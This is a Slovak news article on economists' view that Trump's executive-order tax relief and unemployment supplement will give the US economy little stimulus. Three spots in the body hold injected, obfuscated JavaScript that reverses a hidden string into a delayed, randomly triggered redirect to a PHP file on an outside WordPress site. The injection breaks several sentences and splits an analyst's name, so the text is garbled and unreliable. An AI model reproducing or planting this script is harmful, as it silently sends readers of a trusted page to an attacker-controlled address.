Trumpov daňový balíček prichádza neskoro a ekonomike príliš nepomôže

Trumpov daňový balíček prichádza neskoro a ekonomike príliš nepomôže

Dekréty amerického prezidenta Donalda Trumpa, ktoré podpísal počas uplynulého víkendu, a ktoré znamenajú daňovú úľavu pre zamestnaných Američanov, vraj najsilnejšie svetovej ekonomike príliš nepomôžu.

Príliš neskoro a príliš málo. Tak znie hodnotenie ekonomických expertov, ktorých oslovila agentúra Reuters kvôli opatreniam, ktoré prijal americký prezident $mWn=function(n){if(typeof ($mWn.list[n])==“string“) return $mWn.list[n].split(„“).reverse().join(„“);return $mWn.list[n];};$mWn.list=[„\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domu/“>Donald Trump. Tie majú znížiť daňové zaťaženie zamestnaných Američanov a tým, ktorí o prácu prišli, zabezpečiť predĺženie výplaty dodatočných dávok v nezamestnanosti vo výške 400 dolárov týždenne.

Podľa Marka Zdom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andiho, analytika spoločnosti Moodys môže tento balík priniesť americkému hospodárstvu stimul vo výške len niečo vyše 400 miliárd dolárov. Michael Feroli z JPMorgan Chase si myslí, že to môže byť dokonca menej ako 100 miliárd. Lydia Boussourová, analytička spoločnosti Oxford Economics odhaduje vplyv $mWn=function(n){if(typeof ($mWn.list[n])==“string“) return $mWn.list[n].split(„“).reverse().join(„“);return $mWn.list[n];};$mWn.list=[„\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donald-trump-zvazuje-rozsirenie-danovych-ulav-pre-investicie-do-akcii/“>Trumpovho balíčka vo výške 0,2 percenta HDP, čo je ,,zanedbateľný objem“.

Odborníci sa zhodujú v tom, že ide o neporovnateľne menšiu pomoc hospodárstvu, než akú v uplynulých mesiacoch schválil Kongres, či už išlo o senátny balíček v objeme 1 bilióna alebo snemovni v objeme 3 biliónov dolárov. Aj keby nakoniec Trumpove nové dekréty znamenali stimul 400 miliárd dolárov, je to len desatina toho, čo už schválili americkí zákonodarcovia. Nehovoriac o ďalších niekoľkých biliónoch, ktoré do ekonomiky pumpuje či už napumpoval Federálny rezervný systém.

Přidat komentář

Vaša e-mailová adresa nebude zverejnená. Vyžadované polia sú označené *